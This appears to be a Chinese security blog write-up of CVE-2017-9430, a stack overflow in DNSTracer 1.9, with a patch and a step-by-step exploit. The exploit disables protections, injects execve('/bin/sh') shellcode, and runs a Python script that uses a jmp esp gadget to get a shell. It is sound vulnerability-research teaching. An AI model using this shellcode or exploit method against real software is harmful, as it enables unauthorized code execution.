php组件缓冲区溢出漏洞,DNSTracer 1.9 缓冲区溢出漏洞(CVE-2017-9430)分析

最新推荐文章于 2022-09-14 03:28:38 发布
最新推荐文章于 2022-09-14 03:28:38 发布
阅读量597 收藏 1
点赞数
文章标签: php组件缓冲区溢出漏洞

漏洞描述

DNSTracer 是一个用来跟踪 DNS 解析过程的应用程序。DNSTracer 1.9 及之前的版本中存在栈缓冲区溢出漏洞。攻击者可借助带有较长参数的命令行利用该漏洞造成拒绝服务攻击。

漏洞复现推荐使用的环境备注操作系统Ubuntu 12.04体系结构:32 位

调试器gdb-peda版本号:7.4

漏洞软件DNSTracer版本号:1.9

首先编译安装 DNSTracer:$ wget http://www.mavetju.org/download/dnstracer-1.9.tar.gz

$ tar zxvf dnstracer-1.9.tar.gz

$ cd dnstracer-1.9

$ ./confugure

$ make && sudo make install

传入一段超长的字符串作为参数即可触发栈溢出:$ dnstracer -v $(python -c 'print "A"*1025')

*** buffer overflow detected ***: dnstracer terminated

======= Backtrace: =========

/lib/i386-linux-gnu/libc.so.6(+0x67377)[0xb757f377]

/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x68)[0xb760f6b8]

/lib/i386-linux-gnu/libc.so.6(+0xf58a8)[0xb760d8a8]

/lib/i386-linux-gnu/libc.so.6(+0xf4e9f)[0xb760ce9f]

dnstracer[0x8048f26]

/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb7530637]

dnstracer[0x804920a]

======= Memory map: ========

08048000-0804e000 r-xp 00000000 08:01 270483     /usr/local/bin/dnstracer

0804f000-08050000 r--p 00006000 08:01 270483     /usr/local/bin/dnstracer

08050000-08051000 rw-p 00007000 08:01 270483     /usr/local/bin/dnstracer

08051000-08053000 rw-p 00000000 00:00 0

084b6000-084d7000 rw-p 00000000 00:00 0         [heap]

b74e4000-b7500000 r-xp 00000000 08:01 394789     /lib/i386-linux-gnu/libgcc_s.so.1

b7500000-b7501000 rw-p 0001b000 08:01 394789     /lib/i386-linux-gnu/libgcc_s.so.1

b7518000-b76c8000 r-xp 00000000 08:01 394751     /lib/i386-linux-gnu/libc-2.23.so

b76c8000-b76ca000 r--p 001af000 08:01 394751     /lib/i386-linux-gnu/libc-2.23.so

b76ca000-b76cb000 rw-p 001b1000 08:01 394751     /lib/i386-linux-gnu/libc-2.23.so

b76cb000-b76ce000 rw-p 00000000 00:00 0

b76e4000-b76e7000 rw-p 00000000 00:00 0

b76e7000-b76e9000 r--p 00000000 00:00 0         [vvar]

b76e9000-b76eb000 r-xp 00000000 00:00 0         [vdso]

b76eb000-b770d000 r-xp 00000000 08:01 394723     /lib/i386-linux-gnu/ld-2.23.so

b770d000-b770e000 rw-p 00000000 00:00 0

b770e000-b770f000 r--p 00022000 08:01 394723     /lib/i386-linux-gnu/ld-2.23.so

b770f000-b7710000 rw-p 00023000 08:01 394723     /lib/i386-linux-gnu/ld-2.23.so

bf8e5000-bf907000 rw-p 00000000 00:00 0         [stack]

Aborted (core dumped)

漏洞分析

这个漏洞非常简单也非常典型,发生原因是在把参数 argv[0] 复制到数组 argv0 的时候没有做长度检查,如果大于 1024 字节,就会导致栈溢出:// dnstracer.c

int

main(int argc, char **argv)

{

[...]

charargv0[NS_MAXDNAME];

[...]

strcpy(argv0, argv[0]);// dnstracer_broker.h

#ifndef NS_MAXDNAME

#define NS_MAXDNAME1024

#endif

补丁

要修这个漏洞的话,在调用 strcpy() 前加上对参数长度的检查就可以了:/*CVE-2017-9430 Fix*/

if(strlen(argv[0]) >= NS_MAXDNAME)

{

free(server_ip);

free(server_name);

fprintf(stderr, "dnstracer: argument is too long %s\n", argv[0]);

return 1;

}

// check for a trailing dot

strcpy(argv0, argv[0]);

Exploit

首先修改 Makefile,关掉栈保护,同时避免 gcc 使用安全函数 __strcpy_chk() 替换 strcpy(),修改编译选项如下:$ cat Makefile | grep -w CC

CC = gcc -fno-stack-protector -z execstack -D_FORTIFY_SOURCE=0

COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) \

CCLD = $(CC)

$ make && sudo make install

gdb-peda$ checksec

CANARY   : disabled

FORTIFY   : disabled

NX       : disabled

PIE       : disabled

RELRO     : Partial

最后关掉 ASLR:# echo 0 > /proc/sys/kernel/randomize_va_space

因为漏洞发生在 main 函数中,堆栈的布置比起在子函数里也要复杂一些。大体过程和前面写过的一篇 wget 溢出漏洞差不多,但那一篇是 64 位程序,所以这里选择展示一下 32 位程序。

在 gdb 里进行调试,利用 pattern 确定溢出位置,1060 字节就足够了:gdb-peda$ pattern_create 1060

gdb-peda$ pattern_offset $ebp

1849771630 found at offset: 1049

所以返回地址位于栈偏移 1049+4=1053 的地方。gdb-peda$ disassemble main

0x08048df8 :mov   DWORD PTR [esp+0x4],edi

0x08048dfc :mov   DWORD PTR [esp],ebx

0x08048dff :call   0x8048950

0x08048e04 :xor   eax,eax

0x08048e06 :mov   ecx,esi

...

0x08048f6e :mov   DWORD PTR [esp+0x4],esi

0x08048f72 :call   0x804adb0

0x08048f77 :mov   DWORD PTR [esp],0xa

在下面几个地方下断点,并根据偏移调整我们的输入:gdb-peda$ b *main+815

gdb-peda$ b *main+820

gdb-peda$ b *main+1186

gdb-peda$ r `perl -e 'print "A"x1053 . "BBBB"'`

[----------------------------------registers-----------------------------------]

EAX: 0x1

EBX: 0xbfffeb3f --> 0xffed9cb7

ECX: 0x0

EDX: 0xb7fc7180 --> 0x0

ESI: 0xffffffff

EDI: 0xbffff174 ('A' ...)

EBP: 0xbfffef58 --> 0x0

ESP: 0xbfffe6d0 --> 0xbfffeb3f --> 0xffed9cb7

EIP: 0x8048dff (:call   0x8048950 )

EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)

[-------------------------------------code-------------------------------------]

0x8048df1 :lea   ebx,[esp+0x46f]

0x8048df8 :mov   DWORD PTR [esp+0x4],edi

0x8048dfc :mov   DWORD PTR [esp],ebx

=> 0x8048dff :call   0x8048950

0x8048e04 :xor   eax,eax

0x8048e06 :mov   ecx,esi

0x8048e08 :repnz scas al,BYTE PTR es:[edi]

0x8048e0a :not   ecx

Guessed arguments:

arg[0]: 0xbfffeb3f --> 0xffed9cb7

arg[1]: 0xbffff174 ('A' ...)

[------------------------------------stack-------------------------------------]

0000| 0xbfffe6d0 --> 0xbfffeb3f --> 0xffed9cb7

0004| 0xbfffe6d4 --> 0xbffff174 ('A' ...)

0008| 0xbfffe6d8 --> 0x804be37 ("4cCoq:r:S:s:t:v")

0012| 0xbfffe6dc --> 0x0

0016| 0xbfffe6e0 --> 0x0

0020| 0xbfffe6e4 --> 0x0

0024| 0xbfffe6e8 --> 0x0

0028| 0xbfffe6ec --> 0x0

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Breakpoint 1, 0x08048dff in main (argc=, argv=) at dnstracer.c:1622

1622   strcpy(argv0, argv[0]);

gdb-peda$ x/10wx argv0

0xbfffeb3f:0xffed9cb70x000000bf0x000001000x00000200

0xbfffeb4f:0xe33b97000xfdcac0b70x000000b70xffeff400

0xbfffeb5f:0xe24e08b70x000001b7

所以栈位于 0xbfffeb3f,执行这一行代码即可将 0xbffff174 处的 "A" 字符串复制到 argv0 数组中:gdb-peda$ c

Continuing.

[----------------------------------registers-----------------------------------]

EAX: 0xbfffe6bf ('A' ...)

EBX: 0xbfffe6bf ('A' ...)

ECX: 0xbffff1d0 ("BBBB")

EDX: 0xbfffeadc ("BBBB")

ESI: 0x0

EDI: 0xbfffedb3 ('A' ...)

EBP: 0xbfffead8 ("AAAABBBB")

ESP: 0xbfffe290 --> 0xbfffe6bf ('A' ...)

EIP: 0x8048dba (:mov   ecx,DWORD PTR [ebp-0x82c])

EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)

[-------------------------------------code-------------------------------------]

0x8048db3 :push   edi

0x8048db4 :push   ebx

0x8048db5 :call   0x8048920

=> 0x8048dba :mov   ecx,DWORD PTR [ebp-0x82c]

0x8048dc0 :xor   eax,eax

0x8048dc2 :add   esp,0x10

0x8048dc5 :repnz scas al,BYTE PTR es:[edi]

0x8048dc7 :not   ecx

[------------------------------------stack-------------------------------------]

0000| 0xbfffe290 --> 0xbfffe6bf ('A' ...)

0004| 0xbfffe294 --> 0xbfffedb3 ('A' ...)

0008| 0xbfffe298 --> 0xffffffff

0012| 0xbfffe29c --> 0xffffffff

0016| 0xbfffe2a0 --> 0x0

0020| 0xbfffe2a4 --> 0x0

0024| 0xbfffe2a8 --> 0x8051018 ("127.0.1.1")

0028| 0xbfffe2ac --> 0xffffffff

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Breakpoint 2, main (argc=, argv=) at dnstracer.c:1623

1623   if (argv0[strlen(argv[0]) - 1] == '.') argv0[strlen(argv[0]) - 1] = 0;

gdb-peda$ x/10wx argv0

0xbfffeb3f:0x414141410x414141410x414141410x41414141

0xbfffeb4f:0x414141410x414141410x414141410x41414141

0xbfffeb5f:0x414141410x41414141

gdb-peda$ x/5wx argv0+1053-0x10

0xbfffef4c:0x414141410x414141410x414141410x41414141

0xbfffef5c:0x42424242

同时字符串 "BBBB" 覆盖了返回地址。所以我们用栈地址 0xbfffeb3f 替换掉 "BBBB":gdb-peda$ r `perl -e 'print "A"x1053 . "\x3f\xeb\xff\xbf"'`gdb-peda$ x/5wx argv0+1053-0x10

0xbfffef4c:0x414141410x414141410x414141410x41414141

0xbfffef5c:0xbfffeb3f                                    

然后就可以在栈上布置 shellcode 了,这一段 shellcode 长度为 23 字节,前面使用 nop 指令填充:gdb-peda$ r `perl -e 'print "\x90"x1030 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x3f\xeb\xff\xbf"'`

gdb-peda$ x/7wx argv0+1053-23

0xbfffef45:0x6850c0310x68732f2f0x69622f680x50e3896e

0xbfffef55:0xb0e189530x3f80cd0b0x00bfffeb

根据计算,shellcode 位于 0xbfffef45。

然而当我们执行这个程序的时候,发生了错误:gdb-peda$ c

127.0.0.1 (127.0.0.1) * * *

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]

EAX: 0x0

EBX: 0xbfffef54 ("/bin//sh")

ECX: 0xffffffff

EDX: 0xb7fc88b8 --> 0x0

ESI: 0xe3896e69

EDI: 0xe1895350

EBP: 0x80cd0bb0

ESP: 0xbfffef54 ("/bin//sh")

EIP: 0xbfffef55 ("bin//sh")

EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)

[-------------------------------------code-------------------------------------]

0xbfffef4d:push   0x6e69622f

0xbfffef52:mov   ebx,esp

0xbfffef54:das

=> 0xbfffef55:bound ebp,QWORD PTR [ecx+0x6e]

0xbfffef58:das

0xbfffef59:das

0xbfffef5a:jae   0xbfffefc4

0xbfffef5c:add   BYTE PTR [eax],al

[------------------------------------stack-------------------------------------]

0000| 0xbfffef54 ("/bin//sh")

0004| 0xbfffef58 ("//sh")

0008| 0xbfffef5c --> 0x0

0012| 0xbfffef60 --> 0x0

0016| 0xbfffef64 --> 0xbfffeff4 --> 0xbffff15b ("/usr/local/bin/dnstracer")

0020| 0xbfffef68 --> 0xbffff000 --> 0xbffff596 ("SSH_AGENT_PID=1407")

0024| 0xbfffef6c --> 0xb7fdc858 --> 0xb7e21000 --> 0x464c457f

0028| 0xbfffef70 --> 0x0

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0xbfffef55 in ?? ()

错误发生在 0xbfffef55,而 shellcode 位于 0xbfffef45,两者相差 16 字节:gdb-peda$ x/8wx 0xbfffef45

0xbfffef45:0x6850c0310x68732f2f0x69622f680x2fe3896e

0xbfffef55:0x2f6e69620x0068732f0x000000000xf4000000

所以这里采用的解决办法是去掉前面的 16 个 nop,将其加到 shellcode 后面。gdb-peda$ r `perl -e 'print "\x90"x1014 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x90"x16 . "\x3f\xeb\xff\xbf"'`

成功获得 shell。gdb-peda$ c

127.0.0.1 (127.0.0.1) * * *

process 7161 is executing new program: /bin/dash

$ id

[New process 7165]

process 7165 is executing new program: /usr/bin/id

uid=1000(firmy) gid=1000(firmy) groups=1000(firmy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)

$ [Inferior 2 (process 7165) exited normally]

Warning: not running or target is remote

那如果我们开启了 ASLR 怎么办呢,一种常用的方法是利用指令 jmp esp 覆盖返回地址,这将使程序在返回地址的地方继续执行,从而执行跟在后面的 shellcode。利用 objdump 就可以找到这样的指令:$ objdump -M intel -D /usr/local/bin/dnstracer | grep jmp | grep esp

804cc5f:ff e4               jmp   esp

exp 如下:import os

from subprocess import call

def exp():

filling = "A"*1053

jmp_esp = "\x5f\xcc\x04\x08"

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

payload = filling + jmp_esp + shellcode

call(["dnstracer", payload])

if __name__ == '__main__':

try:

exp()

except Exception as e:

print "Something went wrong"

Bingo!!!$ python exp.py

Tracing to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_�1�Ph//shh/bin��PS���

[a] via 127.0.0.1, maximum of 3 retries

127.0.0.1 (127.0.0.1) * * *

$ id

uid=1000(firmy) gid=1000(firmy) groups=1000(firmy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)

参考资料

王邺华
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
gdb 查看是否 栈溢出_64位Linux栈溢出教程
weixin_39782355的博客
01-17 768
0x01这一系列的文章目的在于快速介绍对缓冲区溢出(在64位下linux二进制程序)弱点的利用。该系列教程适合人群为:熟悉利用32位二进制程序并想应用它们的知识来利用64位二进制程序。该教程是长期的零散笔记,整理总结成的结果。搭建环境在64位与32位linux平台下编写其二进制的利用程序区别不大,然而我们将遇到一些陷阱,学习这种技术最好的方法是实践它,因此我鼓励你跟着教程一起实践。我将在Unbun...
kali+win2008系统扫描+CVE-2017-0143漏洞利用
weixin_46709219的博客
11-24 1609
一)概念讲解  1)系统安全漏洞: 系统安全漏洞指Windows操作系统以及应用软件设计中存在的缺陷。按照威胁类型对安全漏洞进行初步分类:     I)获取控制权:利用该类型漏洞可以获取目标操作系统的管理权限,威胁最大,可影响系统的机密性完整性; 例如:1)MS17_010也称“永恒之蓝”,是在Windows的SMB服务处理SMBv1请求 时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码; 2)这个漏洞被多款恶意软件所利用,如勒索病毒WannaCrypt;     I
CVE-2015-7547溢出漏洞的简单分析与调试 glibc getaddrinfo
vc66vcc的博客
04-27 2873
bug:说明https://www.seebug.org/vuldb/ssvid-90749 漏洞编号:SSV-90749 披露/发现时间:2015-07-13 提交时间:2016-02-17 漏洞等级: 漏洞类别:缓冲区溢出 CVE-ID:CVE-2015-7547 CNNVD-ID:补充  CNVD-ID:补充  漏
碰到调试JNI_CreateJavaVM时SIGSEGV fault错误的解决方案
阿达King哥的博客
09-04 1731
调试时出现 Signal received: SIGSEGV (Segmentation fault) 比较烦。在 jni.cpp 的 JNI_CreateJavaVM 设置断点调试。不同 jdk 版本路径不同。(https://www.jianshu.com/p/fc8f223a3f1b) 这是因为: 测试本来就是要触发SIGSEGV的。而GDB在调试的时候会在程序注册的signal handler之前先获取到signal,要continue才会跑到应用注册的signal handler去。 解决方
浅谈 C 字符串数组的内存布局
私房菜
08-27 877
首先感谢秋豪大佬对文章的校对以及耐心的指导 先献上我的膝盖 or2 整理了四种常见的使用 C 语言字符串数组的形式 分别对这以下几种的内存布局进行分析 char* array[] = { "line1", "line10", "line100", "line1000", }; char **array = { "line1", "line10...
dnstracer1.9漏洞源码
11-22
dnstracer1.9版本含有缓冲区溢出漏洞。是经典栈溢出漏洞,适合新手学习
青藤安全说杂志-第一期-172
最新发布
07-18
详尽的漏洞分析是对漏洞的深入理解,通过漏洞复现、漏洞分析漏洞POC、EXP利用、补丁等几个方面,对GLIBC、DNSTRACER、WGET、SYNAPSE等一些经典漏洞进行全面分析。 安全研究 从系统漏洞、应用漏洞到代码审计、...
MavEtJu's tools-开源
07-14
工具、程序、片段、来自 Edwin `MavEtJu' Groothuis 的文档(ddc dhcping dhcpdump morse daychooser radius ngrep-lib mavbiff httpgrabber ipfw-graph dnstracer
栈迁移过程记录,栈指针rsp、rbp、rip、leave变化过程
qq_39153421的博客
03-11 6079
栈迁移 通过ROP leave_ret 改变ebp的值伪造栈,到达栈迁移的目的。下面就一个题目的一个payload进行调试,逐指令理解栈迁移的过程。这里只是通过ROP来实现,还有一种是通过ROP,向bss段伪造栈,这个以后再说。 stack=rbp-0x70 #指向当前栈顶 # ROPgadget --binary easy_ad --only "pop|ret" | grep rdi pop_rdi_ret=0x400953 fun_addr=0x400756 leave_ret=0x4007B5 pu
【教程】一些服务器常见漏洞的修复方法,亲测超详细
热门推荐
xfxuezhang.cn
09-14 2万+
一些常见的漏洞修复
weblogic 安全漏洞 CVE-2017-5638
weixin_30727835的博客
08-16 1231
   关于安全漏洞 CVE-2017-5638 的 Weblogic Server 防护建议 关于Weblogic Server如何防护防止近期爆出的Struts 2远程代码执行安全漏洞,为您提供以下内容参考。 Oracle WebLogic Server 产品本身没有使用Struts 2, 因此不受此漏洞影响。 只有Oracle WebLogic Server -sample...
cve-2017-12629 apache solr xxe & rce 漏洞分析
whatday的专栏
06-26 1983
Versions Affected Apache Solr before 7.1.0 with Apache Lucene before 7.1 Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Description Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查
bash源代码分析----子进程执行完make_child函数中的fork函数,然后执行shell_execve函数
linux-0.11调试教程
03-15 333
子进程执行完make_child函数中的fork函数,然后执行shell_execve函数 而父进程执行到wait_for函数等待子进程返回。 关键的一部分内容啊。 子进程需要在shell_execve函数处下断点。 至此,我们有几个关键的断点。 第一个,rl_newline函数,输入ls命令回车后会停到rl_newline函数处。 第二个,父进程执行到wait_for函数处等待。 第三个,子进程执行到shell_execve函数处开始执行ls命令。 /* Call execve (), h
简单的栈溢出_hello_elf
Hvnt3r的博客
03-06 561
简单的栈溢出_hello_elf 原文地址:https://hvnt3r.top/2018/09/%E7%AE%80%E5%8D%95%E7%9A%84%E6%A0%88%E6%BA%A2%E5%87%BA-hello-elf/ 最近哥们问了我一道PWN题,觉得比较有代表性而且难度较低,就记录下来以作栈溢出的示例,仅从新手角度分析,大牛绕过 题目地址:https://pan.baidu.com/s...
记一次实验:CVE-2017-12149 jboss反序列化漏洞
weixin_43875708的博客
02-01 351
CVE-2017-12149 jboss反序列化漏洞 漏洞简介 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法...
php组件缓冲区溢出漏洞,一个缓冲区溢出漏洞的简易教程
weixin_39629075的博客
03-12 1141
这篇文章类似于“傻瓜系列之利用缓冲区溢出”。在这类漏洞中,我们的做法是利用网络,程序控制器,输入等等,发送超大的数据缓冲区给程序,覆盖程序内存的重要部分。在这些缓冲区覆盖程序内存之后,我们可以重定向程序的执行流并运行注入代码。首先,我们需要做的是查明程序的哪一部分可以用来重写内存。处理这个任务的过程叫作“fuzzing”。我们可以为Metasploit框架中的各种协议找到若干个fuzzer(执行f...
漏洞复现(CVECVE-2017-9064(csrf漏洞))
FODKING的博客
11-29 3202
实验道具 wordpress <=4.7.4 burpsuite 实验原理 要实施一次csrf漏洞利用必须占据“天时地利人和”,即被攻击方登录了要攻击的网站,且点击了我们伪造的url才会成功。并且漏洞点处请求容易伪造。 实验场景 当管理员用户登录时,点击了攻击者事先构建好的url中的提交按钮时就会被盗取用户。 漏洞存在位置,如图1 图 1 抓包后信息如图29所示 图 2 发现并没有token参数,没有不可预料的认证信息用post方式传递,我们用burpsuite自带的CSRF工具进行构建html
php错误84015,PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
weixin_39873456的博客
03-10 192
漏洞说明不得不再次吐槽一下exploit-db对exp审核的质量,这个exp仍然不能触发漏洞,修改第一个参数则可以触发,我给出的poc是一个可以触发php漏洞的,问题出现在php_tidy.dll扩展中,对tidy_parse_file的第二个参数,也就是文件绝对路径没有进行长度控制和内容校验,导致在fopen失败后进入失败处理逻辑引发缓冲区溢出,下面对此漏洞进行详细分析。软件下载:https:/...
栈溢出漏洞的利用和缓解
weixin_34133829的博客
03-24 815
一直有人说这个时代做渗透太难了, 各个平台都开始重视安全性, 不像十几年前, 随便有个栈溢出就能轻松利用. 现在的环境对于新手而言确实不算友好, 上来就需要 面临着各种边界保护, 堆栈保护, 地址布局随机化. 但现实如此, 与其抱怨, 不如直面现实, 拥抱变化, 对吧? 本文所演示的环境为64位Linux+32位ELF程序. 文中所用到的代码和exp皆可在github仓库中找到. 前言 知识...
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 1846
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值